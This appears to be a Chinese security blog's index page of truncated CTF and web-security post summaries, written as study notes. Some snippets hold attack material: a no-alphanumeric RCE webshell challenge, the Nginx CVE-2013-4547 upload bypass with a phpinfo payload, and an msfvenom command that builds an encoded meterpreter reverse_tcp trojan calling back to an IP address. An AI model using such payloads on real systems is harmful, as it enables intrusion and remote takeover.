ALe3

摘要： 无数字字母RCE，这是一个老生常谈的问题，就是不利用数字和字母构造出webshell，从而能够执行我们的命令。 <?php highlight_file(__FILE__); $code = $_GET['code']; if(preg_match("/[A-Za-z0-9]+/",$code)){ 阅读全文

摘要： 什么是python格式化字符串漏洞 python中，存在几种格式化字符串的方式，然而当我们使用的方式不正确的时候，即格式化的字符串能够被我们控制时，就会导致一些严重的问题，比如获取敏感信息 python常见的格式化字符串 百分号形式进行格式化字符串 >>> name = 'Hu3sky' >>> ' 阅读全文

摘要： 最近的XYCTF又吃了没有好好学反序列化的亏，这下真的真的要好好学反序列化了 基本知识 pickle简介 与PHP类似，python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal，现在开发时一般使用pickl 阅读全文

摘要： 最近为了打vulhub也是搞了好久的docker，搞了半天搞得我头大，结果还是没能成功，不知道为什么起shiro550靶场总是报139的错误，在网上搜了半天也没有解决，有没有师傅救一下喵QaQ 安装就不说了喵，安装完记得换源就好，要不然环境起不了 启动 systemctl start docker 阅读全文

摘要： vulhub起靶场 Nginx 文件名逻辑漏洞（CVE-2013-4547） 上传1.gif，内容为 <?php phpinfo();?> http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php访问文件位置，这里0x00要改包 先访问/upload 阅读全文

摘要： 首先介绍一下典中之典反序列化 什么是序列化和反序列化 Java描述的是一个‘世界’，程序运行开始时，这个‘世界’也开始运作，但‘世界’中的对象不是一成不变的，它的属性会随着程序的运行而改变。 但很多情况下，我们需要保存某一刻某个对象的信息，来进行一些操作。比如利用反序列化将程序运行的对象状态以二进制 阅读全文

摘要： 无列名注入 什么是无列名注入？ 顾名思义，就是在不知道列名的情况下进行 sql 注入。 在 MySQL 5以上的版本中存在一个名为 information_schema 的库，里面记录着 mysql 中所有表的结构。通常，在sql注入中，我们会通过此库中的表去获取其他表的结构，也就是表名、列名等。但 阅读全文

摘要： 刚刚做了一道题里面用到了文件包含的SESSION_UPLOAD_PROGRESS 的利用 是这道题捏 [NPUCTF2020]ezinclude 具体解题我就不贴了，主要是做个笔记 Session Upload Progress 最初是PHP为上传进度条设计的一个功能，在上传文件较大的情况下，PHP 阅读全文

摘要： 依旧是Python黑帽子这本书 先附上代码，我在原书代码上加了注释，更好理解 import sys import socket import threading #生成可打印字符映射 HEX_FILTER=''.join( [(len(repr(chr(i)))==3) and chr(i) or 阅读全文

摘要： 先简单生成一个木马 ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/meterpreter/reverse_tcp lhosts=61.139.2.130 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3 阅读全文